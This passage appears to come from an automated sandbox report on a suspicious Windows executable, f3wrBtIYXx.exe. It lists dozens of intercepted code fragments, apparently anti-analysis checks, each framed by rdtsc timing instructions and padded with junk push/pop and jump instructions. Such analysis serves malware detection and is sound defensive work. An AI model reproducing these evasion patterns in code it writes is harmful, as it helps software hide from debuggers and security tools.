Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 9439D1 second address: 9439E3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5F64D1DAB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 9439E3 second address: 9439E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 9439E7 second address: 9439EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 9439EF second address: 943A33 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 jmp 00007F5F64D1DF26h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F5F64D1DF2Ch 0x00000015 jmp 00007F5F64D1DF26h 0x0000001a jns 00007F5F64D1DF18h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 943A33 second address: 943A39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 943A39 second address: 943A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 943A3D second address: 943A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 943A47 second address: 943A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 943BA9 second address: 943BAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 943BAD second address: 943BB9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 943BB9 second address: 943BD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5F64D1DABCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 943BD3 second address: 943BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94404C second address: 944066 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F5F64D1DABEh 0x0000000e jl 00007F5F64D1DAB6h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 944066 second address: 94406C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94406C second address: 944070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94C282 second address: 94C286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94C286 second address: 94C29B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94C29B second address: 94C2B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5F64D1DF25h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94C2B8 second address: 94C2BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94C2BE second address: 94C308 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5F64D1DF24h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007F5F64D1DF27h 0x00000015 jmp 00007F5F64D1DF23h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94A49C second address: 94A4A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94A4A0 second address: 94A4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F5F64D1DF16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94A7A1 second address: 94A7A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94A7A5 second address: 94A7A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94AA63 second address: 94AA72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jno 00007F5F64D1DAB6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94AA72 second address: 94AA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94AD1C second address: 94AD48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5F64D1DABBh 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F5F64D1DAC9h 0x00000013 jmp 00007F5F64D1DABDh 0x00000018 jnl 00007F5F64D1DAB6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94AD48 second address: 94AD4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94B38B second address: 94B3AF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DAB6h 0x00000008 jmp 00007F5F64D1DAC2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 jbe 00007F5F64D1DAB6h 0x00000016 pop edi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94B3AF second address: 94B3B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94B3B6 second address: 94B3E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F5F64D1DAC9h 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F5F64D1DAB8h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94B3E6 second address: 94B406 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5F64D1DF27h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94B995 second address: 94B9AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94BF78 second address: 94BFA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF20h 0x00000007 jmp 00007F5F64D1DF1Eh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94BFA0 second address: 94BFA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94BFA6 second address: 94BFC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ebx 0x0000000d jns 00007F5F64D1DF1Eh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 94BFC1 second address: 94BFEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 push eax 0x00000008 push edx 0x00000009 jno 00007F5F64D1DAB6h 0x0000000f jp 00007F5F64D1DAB6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 954A08 second address: 954A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 953D4B second address: 953D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 953EF1 second address: 953EF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 954451 second address: 95446D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DABBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b jo 00007F5F64D1DAB8h 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 9546FC second address: 95472E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DF27h 0x00000009 jmp 00007F5F64D1DF27h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 960844 second address: 96084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 96084A second address: 960850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 960850 second address: 960855 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 95EFA1 second address: 95EFA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 95F231 second address: 95F237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 95F237 second address: 95F23B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 95F527 second address: 95F52B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 95F918 second address: 95F91C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 95FFED second address: 95FFF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 95FFF3 second address: 95FFF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 95FFF7 second address: 95FFFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 95FFFD second address: 96000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007F5F64D1DF1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 95E767 second address: 95E76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 95E76B second address: 95E771 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 965C05 second address: 965C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 965DE1 second address: 965DF3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5F64D1DF16h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 96772F second address: 967748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnl 00007F5F64D1DAB6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e jno 00007F5F64D1DAB6h 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 967748 second address: 96774C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 975C63 second address: 975C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F5F64D1DAB6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 975C6D second address: 975C71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8B20ED second address: 8B2105 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5F64D1DAC2h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8B2105 second address: 8B2148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5F64D1DF28h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F5F64D1DF24h 0x00000016 jmp 00007F5F64D1DF1Bh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8B2148 second address: 8B214E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8B214E second address: 8B2165 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF1Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F5F64D1DF16h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 8B2165 second address: 8B2169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 975672 second address: 975676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 975676 second address: 975680 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5F64D1DAB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 9757C3 second address: 9757F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5F64D1DF21h 0x0000000b ja 00007F5F64D1DF16h 0x00000011 jng 00007F5F64D1DF16h 0x00000017 jmp 00007F5F64D1DF1Bh 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 9757F2 second address: 975806 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5F64D1DABCh 0x00000008 jo 00007F5F64D1DAB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 975806 second address: 975810 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5F64D1DF16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 978AAE second address: 978AB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5020F1B second address: 5020F3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F5F64D1DF29h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5020F3F second address: 5020F45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5020F45 second address: 5020F49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5020F49 second address: 5020F8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007F5F64D1DABFh 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushfd 0x00000016 jmp 00007F5F64D1DAC2h 0x0000001b and cx, 5D58h 0x00000020 jmp 00007F5F64D1DABBh 0x00000025 popfd 0x00000026 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 50301DD second address: 5030201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DF29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movzx ecx, dx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5050758 second address: 5050773 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5050773 second address: 5050779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 505088E second address: 50508E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 75C4B90Ah 0x00000009 popad 0x0000000a popad 0x0000000b mov ecx, eax 0x0000000d jmp 00007F5F64D1DAC1h 0x00000012 xor eax, dword ptr [ebp+08h] 0x00000015 jmp 00007F5F64D1DAC7h 0x0000001a and ecx, 1Fh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F5F64D1DAC5h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5000037 second address: 500003D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 500003D second address: 500006F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b pushad 0x0000000c mov ax, di 0x0000000f jmp 00007F5F64D1DAC1h 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5F64D1DABDh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 500006F second address: 50000CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and esp, FFFFFFF8h 0x0000000e jmp 00007F5F64D1DF1Fh 0x00000013 xchg eax, ecx 0x00000014 pushad 0x00000015 pushad 0x00000016 jmp 00007F5F64D1DF22h 0x0000001b call 00007F5F64D1DF22h 0x00000020 pop esi 0x00000021 popad 0x00000022 mov esi, ebx 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5F64D1DF23h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 50000CE second address: 5000175 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5F64D1DAC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b push esi 0x0000000c mov edx, 6FC5F4DEh 0x00000011 pop edi 0x00000012 pushfd 0x00000013 jmp 00007F5F64D1DAC4h 0x00000018 jmp 00007F5F64D1DAC5h 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 pushad 0x00000021 jmp 00007F5F64D1DABCh 0x00000026 mov si, F7A1h 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007F5F64D1DAC7h 0x00000031 xchg eax, ebx 0x00000032 pushad 0x00000033 pushad 0x00000034 mov ecx, 0D11DA81h 0x00000039 popad 0x0000003a movsx edi, si 0x0000003d popad 0x0000003e mov ebx, dword ptr [ebp+10h] 0x00000041 jmp 00007F5F64D1DAC4h 0x00000046 xchg eax, esi 0x00000047 pushad 0x00000048 push eax 0x00000049 push edx 0x0000004a mov ebx, esi 0x0000004c rdtsc
Source: C:\Users\user\Desktop\f3wrBtIYXx.exe RDTSC instruction interceptor: First address: 5000175 second address: 5000214 instructions: 0x00000000 rdtsc 0x00000002 mov ch, DEh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F5F64D1DF25h 0x0000000c adc cl, FFFFFFE6h 0x0000000f jmp 00007F5F64D1DF21h 0x00000014 popfd 0x00000015 popad 0x00000016 push eax 0x00000017 pushad 0x00000018 mov si, dx 0x0000001b movsx ebx, si 0x0000001e popad 0x0000001f xchg eax, esi 0x00000020 pushad 0x00000021 mov esi, 2A735907h 0x00000026 mov ax, 7EA3h 0x0000002a popad 0x0000002b mov esi, dword ptr [ebp+08h] 0x0000002e pushad 0x0000002f call 00007F5F64D1DF24h 0x00000034 pushad 0x00000035 popad 0x00000036 pop ecx 0x00000037 mov ebx, 5453E294h 0x0000003c popad 0x0000003d push eax 0x0000003e pushad 0x0000003f mov si, DAF5h 0x00000043 pushfd 0x00000044 jmp 00007F5F64D1DF22h 0x00000049 sub cl, 00000048h 0x0000004c jmp 00007F5F64D1DF1Bh 0x00000051 popfd 0x00000052 popad 0x00000053 mov dword ptr [esp], edi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 mov cl, dh 0x0000005b mov esi, 58F84E53h 0x00000060 popad 0x00000061 rdtsc
